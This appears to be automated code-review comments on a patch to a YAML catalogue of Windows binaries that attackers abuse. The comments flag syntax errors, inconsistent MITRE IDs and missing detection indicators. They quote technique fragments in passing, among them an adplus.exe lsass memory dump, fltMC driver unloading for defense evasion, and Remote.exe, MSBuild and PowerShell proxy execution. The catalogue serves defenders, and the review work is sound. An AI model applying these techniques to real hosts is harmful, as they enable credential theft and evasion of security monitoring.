C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\winword.exe - Path: C:\Program Files (x86)\Microsoft Office\Office16\winword.exe
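Review bot: In yml/LOLUtilz/OtherBinaries/Upload.yml the `Commands:` key is missing, so the `- Command:` item follows `Created:` directly, and the Detection line `- IOC: "%localappdata%\Whatsapp\Update.exe" spawned an unknown process` opens a double-quoted scalar and then continues as plain text, which a YAML parser rejects. Add `Commands:` after `Created:` and wrap the whole IOC value in single quotes. The file name (Upload.yml) also does not match `Name: Update.exe`; pick a name that matches the binary and does not collide with the existing yml/OtherMSBinaries/Update.yml.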
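Review bot: yml/OSBinaries/AppInstaller.yml ships without a `Detection:` block, and its `MitreLink` uses the old `https://attack.mitre.org/wiki/Technique/T1105` form while other entries added in this patch use `https://attack.mitre.org/techniques/...`. Add at least one IOC (for example, AppInstaller.exe writing into the INetCache path already named in the Description) and switch the link to the current URL form.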
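Review bot: In yml/OSBinaries/DataSvcUtil.yml the first Detection item, `The DataSvcUtil.exe tool is installed in the .NET Framework directory.`, describes where the binary lives and is not an indicator; drop it or move it to the Description. `Created: '01/12/2020'` is ambiguous between day-first and month-first, whereas the other new entries use `YYYY-MM-DD`. The doubled backslashes in `/out:C:\\Windows\\System32\\calc.exe` are literal in a plain YAML scalar, so the rendered command will show `\\`; use single backslashes.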
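Review bot: yml/OSBinaries/Dllhost.yml leaves `Detection:` as a bare `- IOC:` with no value, so the entry gives defenders nothing to alert on. Fill it in from the command the entry already documents, for example process creation of dllhost.exe with a `/Processid:` CLSID that is not expected on the host. `- Code:` under `Code_Sample:` is also at column zero, unlike the two-space list indentation used everywhere else in the file, and `MitreID: T1546.015` sits next to `Category: Execute`; confirm which of the two is intended.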
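Review bot: yml/OSBinaries/IMEWDBLD.yml has no `Detection:` block even though the Description names the exact cache locations the download lands in; add an IOC for IMEWDBLD.exe making outbound connections or writing under `%LocalAppData%\Microsoft\Windows\INetCache\`. In the Description, the paths mix separators (`<8_RANDOM_ALNUM_CHARS>/[1].`), "served at by that URL" needs rewording, and `MitreLink` uses the old `wiki/Technique/T1105` form.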
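Review bot: In yml/OSBinaries/Msbuild.yml the last hunk replaces the closing `---` with `---` and no trailing newline, which is whitespace churn; keep the final newline. The new `msbuild.exe project.proj` command states "Requires Visual Studio MSBuild v14.0+" but the Detection list is unchanged, so consider adding an IOC that names the newly added `C:\Program Files (x86)\MSBuild\14.0\bin\MSBuild.exe` path.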
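Review bot: In yml/OSBinaries/Pnputil.yml `Code_Sample:` is a bare URL scalar, while every other entry in this patch uses a list of `- Code:` items, so a consumer that iterates the list will break on this file. The entry also has no `Detection:` block for a driver install that needs Administrator, `Created: 25/12/2020` does not follow the `YYYY-MM-DD` form used elsewhere, and the Description ("used for Install drivers.") should be a proper sentence.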
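Review bot: yml/OSBinaries/fltMC.yml sets `Category: ADS`, but the command unloads a driver and the Usecase is "Defense evasion"; ADS is used elsewhere in this repository for Alternate Data Streams (see Cmd.yml), so this looks like a copy-paste leftover. `MitreID: T1562` also disagrees with `MitreLink: https://attack.mitre.org/techniques/T1562/002/`, which points at a sub-technique; make the ID and the link name the same technique. The IOC `4688 events with fltMC.exe` would be more useful if it named the `unload` argument.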
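Review bot: In yml/OSScripts/CL_LoadAssembly.yml the Command value starts with a stray typographic quote (`'”powershell.exe -command "set-location ...`) and the straight double quote opened after `-command` is never closed before the final `'`, so the documented command line is not what a defender would see in process logs. Remove the `”` and close the `"` after `[Program]::Fun()`. `Detection:` is an empty `- IOC:`; at minimum note powershell.exe importing a script from `C:\Windows\diagnostics\system\Audio`.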
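Review bot: In yml/OSScripts/UtilityFunctions.yml the Command opens its argument with a straight `"` but closes it with a typographic `”` (`[Program.Class]::Main()”'`); replace it with a straight quote so the string is balanced and searchable. `Detection:` is an empty `- IOC:` here as well, and the file ends without a trailing newline.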
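Review bot: yml/OtherMSBinaries/Adplus.yml documents an lsass memory dump but leaves `Detection:` as an empty `- IOC:`; add an indicator derived from the command itself, such as adplus.exe started with `-pn lsass.exe`. `Created: 1/9/2021` is ambiguous and should use `YYYY-MM-DD`, and the output path `c:\users\mr.d0x\output\folder` would read better as a neutral placeholder.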
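Review bot: In yml/OtherMSBinaries/Cdb.yml the second hunk renames the existing key `Acknowledgement:` to `Acknoledgement:`, which is a typo and will make the credits disappear for any consumer that reads the correctly spelled key; revert that line and keep only the added `- Person:` items. The new command also leaves `MitreID:` and `MitreLink:` blank while the existing command in the same file uses T1218, and the closing `---` loses its trailing newline.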
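Review bot: yml/OtherMSBinaries/Remote.yml lists `Remote.exe /s "powershell.exe" anythinghere` twice with identical Description and Usecase, differing only in `Category`, and all three commands leave `MitreID:`, `MitreLink:` and `OperatingSystem:` empty. Fill those fields (other signed-binary proxy entries in this patch use T1218) and make the two duplicate entries say what distinguishes them. The IOC `remote.exe spawned` should say whether it means remote.exe starting or remote.exe launching a child process, and `Created: 1/6/2021` should use `YYYY-MM-DD`.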
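Review bot: In yml/OtherMSBinaries/Update.yml the `--removeShortcut` entry keeps `Usecase: Execute binary` and `Category: Execute` although its Description is about deleting the Startup shortcut and its `MitreID` is T1070; change the Usecase and Category to match. The `--createShortcut` entry has `MitreID: T1547` with a link to `/techniques/T1547/001/`, so the ID and link should be aligned, and neither new command adds a Detection item for a shortcut appearing in `%appdata%\Microsoft\Windows\Start Menu\Programs\Startup`. The added `- Person: Jesus Galvez` has no `Handle:` line.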
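Review bot: In yml/OtherMSBinaries/VisualUiaVerifyNative.yml the Description path `C:\Users\[current user]\AppData\Roaminguiverify.config` appears to be missing a backslash between `Roaming` and `uiverify.config`; please confirm and correct it, since defenders will use this path for file-creation monitoring. The only IOC, `Sysmon Event ID 1 - Process Creation`, is generic; add one for writes to that config file.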